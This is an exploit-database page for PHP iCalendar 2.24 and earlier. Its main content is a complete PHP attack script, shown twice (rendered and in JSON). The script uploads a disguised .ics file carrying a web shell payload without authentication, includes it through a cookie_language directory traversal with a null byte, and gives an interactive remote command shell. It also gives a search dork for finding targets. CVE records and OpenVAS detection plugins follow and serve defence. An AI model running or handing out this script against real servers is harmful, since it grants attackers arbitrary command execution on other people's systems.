Search...

PHP iCalendar <= 2.24 cookie_language LFI / File Upload Exploit

2008-09-21T00:00:00

ID EDB-ID:6519
Type exploitdb
Reporter EgiX
Modified 2008-09-21T00:00:00

Description

PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit. CVE-2008-5967,CVE-2008-5968. Webapps exploit for php platform

                                        
                                            &lt;?php

/*
	-----------------------------------------------------------------
	PHP iCalendar &lt;= 2.24 (cookie_language) LFI / File Upload Exploit
	-----------------------------------------------------------------
	
	author...: EgiX
	mail.....: n0b0d13s[at]gmail[dot]com
	
	link.....: http://phpicalendar.net/
	dork.....: "Powered by PHP iCalendar"
	
	[-] vulnerable code in /admin/index.php
	
	65.	// Add or Update a calendar
	66.	$addupdate_msg 	= '';
	67.	if ((isset($_POST['action']))  && ($_POST['action'] == 'addupdate')) {
	68.		for ($filenumber = 1; $filenumber &lt; 6; $filenumber++) {
	69.			$file = $_FILES['calfile'];
	70.			$addupdate_success = FALSE;
	71.	
	72.			if (!is_uploaded_file_v4($file['tmp_name'][$filenumber])) {
	73.				$upload_error = get_upload_error($file['error'][$filenumber]);
	74.			} elseif (!is_uploaded_ics($file['name'][$filenumber])) {
	75.				$upload_error = $upload_error_type_lang;
	76.			} elseif (!copy_cal($file['tmp_name'][$filenumber], $file['name'][$filenumber])) {
	77.				$upload_error = $copy_error_lang . " " . $file['tmp_name'][$filenumber] . " - " . $calendar_path . "/" . $file['name'][$filenumber];
	78.			} else {
	79.				$addupdate_success = TRUE;
	80.			}
	81.			
	82.			if ($addupdate_success == TRUE) {
	83.				$addupdate_msg = $addupdate_msg . '&lt;font color="green"&gt;'.$lang['l_cal_file'].' #'.$filenumber.': '.$lang['l_action_success'].'&lt;/font&gt;&lt;br /&gt;';
	84.			} else {
	85.				$addupdate_msg = $addupdate_msg . '&lt;font color="red"&gt;'.$lang['l_cal_file'].' #'.$filenumber.': '.$lang['l_upload_error'].'&lt;/font&gt;&lt;br /&gt;';
	86.			}
	87.		}
	88.	}
	
	restricted access to this script isn't properly realized, so an attacker might be able to upload a calendar file
	(with .ics extension) into /calendars directory...multiple file extensions isn't checked, but 'ics' is generally
	recognized as text/calendar MIME type by most servers...so this poc try to include the uploaded file using the
	same LFI bug found by rgod (http://retrogod.altervista.org/phpical_221_incl_xpl.html), that isn't still patched!
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

define(STDIN, fopen("php://stdin", "r"));

function http_send($host, $packet)
{
	$sock = fsockopen($host, 80);
	while (!$sock)
	{
		print "\n[-] No response from {$host}:80 Trying again...";
		$sock = fsockopen($host, 80);
	}
	fputs($sock, $packet);
	while (!feof($sock)) $resp .= fread($sock, 1024);
	fclose($sock);
	return $resp;
}

print "\n+---------------------------------------------------------------------------+";
print "\n| PHP iCalendar &lt;= 2.24 (cookie_language) LFI / File Upload Exploit by EgiX |";
print "\n+---------------------------------------------------------------------------+\n";

if ($argc &lt; 3)
{
	print "\nUsage......: php $argv[0] host path\n";
	print "\nExample....: php $argv[0] localhost /";
	print "\nExample....: php $argv[0] localhost /phpicalendar/\n";
	die();
}

$host = $argv[1];
$path = $argv[2];

$payload  = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
$payload .= "addupdate\r\n";
$payload .= "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"calfile[1]\"; filename=\"fake_cal.ics\"\r\n\r\n";
$payload .= "BEGIN:VCALENDAR\n&lt;?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die()} ?&gt;\r\n";
$payload .= "--o0oOo0o--\r\n";

$packet   = "POST {$path}admin/index.php HTTP/1.0\r\n";
$packet  .= "Host: {$host}\r\n";
$packet  .= "Content-Length: ".strlen($payload)."\r\n";
$packet  .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet  .= "Connection: close\r\n\r\n";
$packet  .= $payload;
	
http_send($host, $packet);

$packet  = "GET {$path}preferences.php?action=setcookie HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";

preg_match("/Set-Cookie: (phpicalendar_[^=]*)=/", http_send($host, $packet), $cookie);

$data = urlencode(serialize(array("cookie_language" =&gt; "../calendars/fake_cal.ics".chr(0))));

while(1)
{
	print "\nphpicalendar-shell# ";
	$cmd = trim(fgets(STDIN));
	if ($cmd != "exit")
	{
		$packet  = "GET {$path}print.php HTTP/1.0\r\n";
		$packet .= "Host: {$host}\r\n";
		$packet .= "Cookie: {$cookie[1]}={$data}\r\n";
		$packet .= "Cmd: ".base64_encode($cmd)."\r\n";
		$packet .= "Connection: close\r\n\r\n";
		$output  = http_send($host, $packet);
		$shell   = explode("_code_", $output);
		preg_match("/_code_/", $output) ? print "\n{$shell[1]}" : die("\n[-] Exploit failed...\n");
	}
	else break;
}

?&gt;

# milw0rm.com [2008-09-21]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:6519", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PHP iCalendar <= 2.24 cookie_language LFI / File Upload Exploit", "description": "PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit. CVE-2008-5967,CVE-2008-5968. Webapps exploit for php platform", "published": "2008-09-21T00:00:00", "modified": "2008-09-21T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/6519/", "reporter": "EgiX", "references": [], "cvelist": ["CVE-2008-5967", "CVE-2008-5968"], "lastseen": "2016-02-01T00:02:20", "viewCount": 5, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2016-02-01T00:02:20", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5967", "CVE-2008-5968"]}, {"type": "openvas", "idList": ["OPENVAS:900199", "OPENVAS:1361412562310900199"]}], "modified": "2016-02-01T00:02:20", "rev": 2}, "vulnersScore": 7.0}, "sourceHref": "https://www.exploit-db.com/download/6519/", "sourceData": "<?php\n\n/*\n\t-----------------------------------------------------------------\n\tPHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit\n\t-----------------------------------------------------------------\n\t\n\tauthor...: EgiX\n\tmail.....: n0b0d13s[at]gmail[dot]com\n\t\n\tlink.....: http://phpicalendar.net/\n\tdork.....: \"Powered by PHP iCalendar\"\n\t\n\t[-] vulnerable code in /admin/index.php\n\t\n\t65.\t// Add or Update a calendar\n\t66.\t$addupdate_msg \t= '';\n\t67.\tif ((isset($_POST['action'])) && ($_POST['action'] == 'addupdate')) {\n\t68.\t\tfor ($filenumber = 1; $filenumber < 6; $filenumber++) {\n\t69.\t\t\t$file = $_FILES['calfile'];\n\t70.\t\t\t$addupdate_success = FALSE;\n\t71.\t\n\t72.\t\t\tif (!is_uploaded_file_v4($file['tmp_name'][$filenumber])) {\n\t73.\t\t\t\t$upload_error = get_upload_error($file['error'][$filenumber]);\n\t74.\t\t\t} elseif (!is_uploaded_ics($file['name'][$filenumber])) {\n\t75.\t\t\t\t$upload_error = $upload_error_type_lang;\n\t76.\t\t\t} elseif (!copy_cal($file['tmp_name'][$filenumber], $file['name'][$filenumber])) {\n\t77.\t\t\t\t$upload_error = $copy_error_lang . \" \" . $file['tmp_name'][$filenumber] . \" - \" . $calendar_path . \"/\" . $file['name'][$filenumber];\n\t78.\t\t\t} else {\n\t79.\t\t\t\t$addupdate_success = TRUE;\n\t80.\t\t\t}\n\t81.\t\t\t\n\t82.\t\t\tif ($addupdate_success == TRUE) {\n\t83.\t\t\t\t$addupdate_msg = $addupdate_msg . ''.$lang['l_cal_file'].' #'.$filenumber.': '.$lang['l_action_success'].' ';\n\t84.\t\t\t} else {\n\t85.\t\t\t\t$addupdate_msg = $addupdate_msg . ''.$lang['l_cal_file'].' #'.$filenumber.': '.$lang['l_upload_error'].' ';\n\t86.\t\t\t}\n\t87.\t\t}\n\t88.\t}\n\t\n\trestricted access to this script isn't properly realized, so an attacker might be able to upload a calendar file\n\t(with .ics extension) into /calendars directory...multiple file extensions isn't checked, but 'ics' is generally\n\trecognized as text/calendar MIME type by most servers...so this poc try to include the uploaded file using the\n\tsame LFI bug found by rgod (http://retrogod.altervista.org/phpical_221_incl_xpl.html), that isn't still patched!\n*/\n\nerror_reporting(0);\nset_time_limit(0);\nini_set(\"default_socket_timeout\", 5);\n\ndefine(STDIN, fopen(\"php://stdin\", \"r\"));\n\nfunction http_send($host, $packet)\n{\n\t$sock = fsockopen($host, 80);\n\twhile (!$sock)\n\t{\n\t\tprint \"\\n[-] No response from {$host}:80 Trying again...\";\n\t\t$sock = fsockopen($host, 80);\n\t}\n\tfputs($sock, $packet);\n\twhile (!feof($sock)) $resp .= fread($sock, 1024);\n\tfclose($sock);\n\treturn $resp;\n}\n\nprint \"\\n+---------------------------------------------------------------------------+\";\nprint \"\\n| PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit by EgiX |\";\nprint \"\\n+---------------------------------------------------------------------------+\\n\";\n\nif ($argc < 3)\n{\n\tprint \"\\nUsage......: php $argv[0] host path\\n\";\n\tprint \"\\nExample....: php $argv[0] localhost /\";\n\tprint \"\\nExample....: php $argv[0] localhost /phpicalendar/\\n\";\n\tdie();\n}\n\n$host = $argv[1];\n$path = $argv[2];\n\n$payload = \"--o0oOo0o\\r\\n\";\n$payload .= \"Content-Disposition: form-data; name=\\\"action\\\"\\r\\n\\r\\n\";\n$payload .= \"addupdate\\r\\n\";\n$payload .= \"--o0oOo0o\\r\\n\";\n$payload .= \"Content-Disposition: form-data; name=\\\"calfile[1]\\\"; filename=\\\"fake_cal.ics\\\"\\r\\n\\r\\n\";\n$payload .= \"BEGIN:VCALENDAR\\n<?php \\${print(_code_)}.\\${passthru(base64_decode(\\$_SERVER[HTTP_CMD]))}.\\${die()} ?>\\r\\n\";\n$payload .= \"--o0oOo0o--\\r\\n\";\n\n$packet = \"POST {$path}admin/index.php HTTP/1.0\\r\\n\";\n$packet .= \"Host: {$host}\\r\\n\";\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\n$packet .= \"Content-Type: multipart/form-data; boundary=o0oOo0o\\r\\n\";\n$packet .= \"Connection: close\\r\\n\\r\\n\";\n$packet .= $payload;\n\t\nhttp_send($host, $packet);\n\n$packet = \"GET {$path}preferences.php?action=setcookie HTTP/1.0\\r\\n\";\n$packet .= \"Host: {$host}\\r\\n\";\n$packet .= \"Connection: close\\r\\n\\r\\n\";\n\npreg_match(\"/Set-Cookie: (phpicalendar_[^=]*)=/\", http_send($host, $packet), $cookie);\n\n$data = urlencode(serialize(array(\"cookie_language\" => \"../calendars/fake_cal.ics\".chr(0))));\n\nwhile(1)\n{\n\tprint \"\\nphpicalendar-shell# \";\n\t$cmd = trim(fgets(STDIN));\n\tif ($cmd != \"exit\")\n\t{\n\t\t$packet = \"GET {$path}print.php HTTP/1.0\\r\\n\";\n\t\t$packet .= \"Host: {$host}\\r\\n\";\n\t\t$packet .= \"Cookie: {$cookie[1]}={$data}\\r\\n\";\n\t\t$packet .= \"Cmd: \".base64_encode($cmd).\"\\r\\n\";\n\t\t$packet .= \"Connection: close\\r\\n\\r\\n\";\n\t\t$output = http_send($host, $packet);\n\t\t$shell = explode(\"_code_\", $output);\n\t\tpreg_match(\"/_code_/\", $output) ? print \"\\n{$shell[1]}\" : die(\"\\n[-] Exploit failed...\\n\");\n\t}\n\telse break;\n}\n\n?>\n\n# milw0rm.com [2008-09-21]\n", "osvdbidlist": ["48654", "51602"], "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T05:35:19", "description": "Directory traversal vulnerability in print.php in PHP iCalendar 2.24 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the cookie_language parameter in a phpicalendar_* cookie, a different vector than CVE-2006-1292.", "edition": 6, "cvss3": {}, "published": "2009-01-26T20:30:00", "title": "CVE-2008-5968", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5968"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:phpicalendar:phpicalendar:0.8", "cpe:/a:phpicalendar:phpicalendar:1.0", "cpe:/a:phpicalendar:phpicalendar:0.9.5", "cpe:/a:phpicalendar:phpicalendar:2.1", "cpe:/a:phpicalendar:phpicalendar:2.0", "cpe:/a:phpicalendar:phpicalendar:2.24", "cpe:/a:phpicalendar:phpicalendar:2.0.1", "cpe:/a:phpicalendar:phpicalendar:2.2", "cpe:/a:phpicalendar:phpicalendar:2.21", "cpe:/a:phpicalendar:phpicalendar:2.0c", "cpe:/a:phpicalendar:phpicalendar:2.22", "cpe:/a:phpicalendar:phpicalendar:0.9", "cpe:/a:phpicalendar:phpicalendar:1.1", "cpe:/a:phpicalendar:phpicalendar:0.7", "cpe:/a:phpicalendar:phpicalendar:2.23"], "id": "CVE-2008-5968", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5968", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpicalendar:phpicalendar:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.23:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:0.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:0.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.23:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.0:beta:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.24:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.22:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.21:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.0c:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:0.7:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:19", "description": "admin/index.php in PHP iCalendar 2.3.4, 2.24, and earlier does not require administrative authentication for an addupdate action, which allows remote attackers to upload a calendar (aka .ics) file with arbitrary content to the calendars/ directory outside the web root.", "edition": 6, "cvss3": {}, "published": "2009-01-26T20:30:00", "title": "CVE-2008-5967", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5967"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:phpicalendar:phpicalendar:0.8", "cpe:/a:phpicalendar:phpicalendar:1.0", "cpe:/a:phpicalendar:phpicalendar:0.9.5", "cpe:/a:phpicalendar:phpicalendar:2.1", "cpe:/a:phpicalendar:phpicalendar:2.0", "cpe:/a:phpicalendar:phpicalendar:2.24", "cpe:/a:phpicalendar:phpicalendar:2.0.1", "cpe:/a:phpicalendar:phpicalendar:2.2", "cpe:/a:phpicalendar:phpicalendar:2.21", "cpe:/a:phpicalendar:phpicalendar:2.0c", "cpe:/a:phpicalendar:phpicalendar:2.22", "cpe:/a:phpicalendar:phpicalendar:0.9", "cpe:/a:phpicalendar:phpicalendar:1.1", "cpe:/a:phpicalendar:phpicalendar:0.7", "cpe:/a:phpicalendar:phpicalendar:2.3.4", "cpe:/a:phpicalendar:phpicalendar:2.23"], "id": "CVE-2008-5967", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5967", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpicalendar:phpicalendar:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.23:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:0.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:0.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.23:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.0:beta:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.24:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.22:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.21:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:2.0c:*:*:*:*:*:*:*", "cpe:2.3:a:phpicalendar:phpicalendar:0.7:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-02T21:14:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5967", "CVE-2008-5968"], "description": "This host is running PHP iCalendar and is prone to multiple\n vulnerabilities.", "modified": "2017-01-27T00:00:00", "published": "2009-01-29T00:00:00", "id": "OPENVAS:900199", "href": "http://plugins.openvas.org/nasl.php?oid=900199", "type": "openvas", "title": "Multiple Vulnerabilities in PHP iCalendar", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_php_icalendar_mult_vuln.nasl 5122 2017-01-27 12:16:00Z teissa $\n#\n# Multiple Vulnerabilities in PHP iCalendar\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"PHP iCalendar version 2.34 and prior on all running platform.\n\n Workaround:\n Restrict access to 'admin' area by adding security policies in '.htaccess'\";\n\ntag_impact = \"Successful exploitation could result in Security Bypass or Directory\n Traversal attack on the affected web application.\n Impact Level: Application\";\ntag_insight = \"- Error in admin/index.php file allows remote attackers to upload\n .ics file with arbitrary contents to the calendars/directory.\n - print.php file allows to include and execute arbitrary local files via\n a '../' in the cookie_language parameter in phpicalendar_* cookie.\";\ntag_solution = \"No solution or patch was made available for at least one year since disclosure\n of this vulnerability. Likely none will be provided anymore. General solution\n options are to upgrade to a newer release, disable respective features,\n remove the product or replace the product by another one.\n For updates refer to http://phpicalendar.net\";\ntag_summary = \"This host is running PHP iCalendar and is prone to multiple\n vulnerabilities.\";\n\nif(description)\n{\n script_id(900199);\n script_version(\"$Revision: 5122 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-27 13:16:00 +0100 (Fri, 27 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-29 15:16:47 +0100 (Thu, 29 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2008-5967\", \"CVE-2008-5968\");\n script_name(\"Multiple Vulnerabilities in PHP iCalendar\");\n desc = \"\n\n Summary:\n \" + tag_summary + \"\n\n Vulnerability Insight:\n \" + tag_insight + \"\n\n Impact:\n \" + tag_impact + \"\n\n Affected Software/OS:\n \" + tag_affected + \"\n Solution:\n \" + tag_solution;\n script_xref(name : \"URL\" , value : \"http://milw0rm.com/exploits/6519\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/31944\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_php_icalendar_detect.nasl\");\n script_require_keys(\"PHP/iCalendar/Ver\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\nport = get_http_port(default:80);\nif(!port){\n exit(0);\n}\n\nicalendarVer = get_kb_item(\"PHP/iCalendar/Ver\");\nif(!icalendarVer){\n exit(0);\n}\n\n#Check for version 2.34 and prior\nif(version_is_less_equal(version:icalendarVer, test_version:\"2.34\"))\n{\n security_message(port);\n security_message(data:string(desc, \"\\nPlease Ignore the warning, if\"+\n \" version is greater than 2.24, as later versions\\n\"+\n \"are not affected by Directory Traversal attack.\"), port);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5967", "CVE-2008-5968"], "description": "This host is running PHP iCalendar and is prone to multiple\n vulnerabilities.", "modified": "2019-03-07T00:00:00", "published": "2009-01-29T00:00:00", "id": "OPENVAS:1361412562310900199", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900199", "type": "openvas", "title": "Multiple Vulnerabilities in PHP iCalendar", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_php_icalendar_mult_vuln.nasl 14031 2019-03-07 10:47:29Z cfischer $\n#\n# Multiple Vulnerabilities in PHP iCalendar\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpicalendar:phpicalendar\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900199\");\n script_version(\"$Revision: 14031 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-07 11:47:29 +0100 (Thu, 07 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-29 15:16:47 +0100 (Thu, 29 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2008-5967\", \"CVE-2008-5968\");\n script_name(\"Multiple Vulnerabilities in PHP iCalendar\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_php_icalendar_detect.nasl\");\n script_mandatory_keys(\"PHP/iCalendar/detected\");\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"http://milw0rm.com/exploits/6519\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/31944\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could result in Security Bypass or Directory\n Traversal attack on the affected web application.\");\n\n script_tag(name:\"insight\", value:\"- Error in admin/index.php file allows remote attackers to upload\n .ics file with arbitrary contents to the calendars/directory.\n\n - print.php file allows to include and execute arbitrary local files via\n a '../' in the cookie_language parameter in phpicalendar_* cookie.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"This host is running PHP iCalendar and is prone to multiple\n vulnerabilities.\");\n\n script_tag(name:\"affected\", value:\"PHP iCalendar version 2.34 and prior on all running platform.\n\n Workaround:\n Restrict access to 'admin' area by adding security policies in '.htaccess'\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! vers = get_app_version( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( version_is_less_equal( version:vers, test_version:\"2.34\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"WillNotFix\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

PHP iCalendar &lt;= 2.24 cookie_language LFI / File Upload Exploit

Description

PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit. CVE-2008-5967,CVE-2008-5968. Webapps exploit for php platform

PHP iCalendar <= 2.24 cookie_language LFI / File Upload Exploit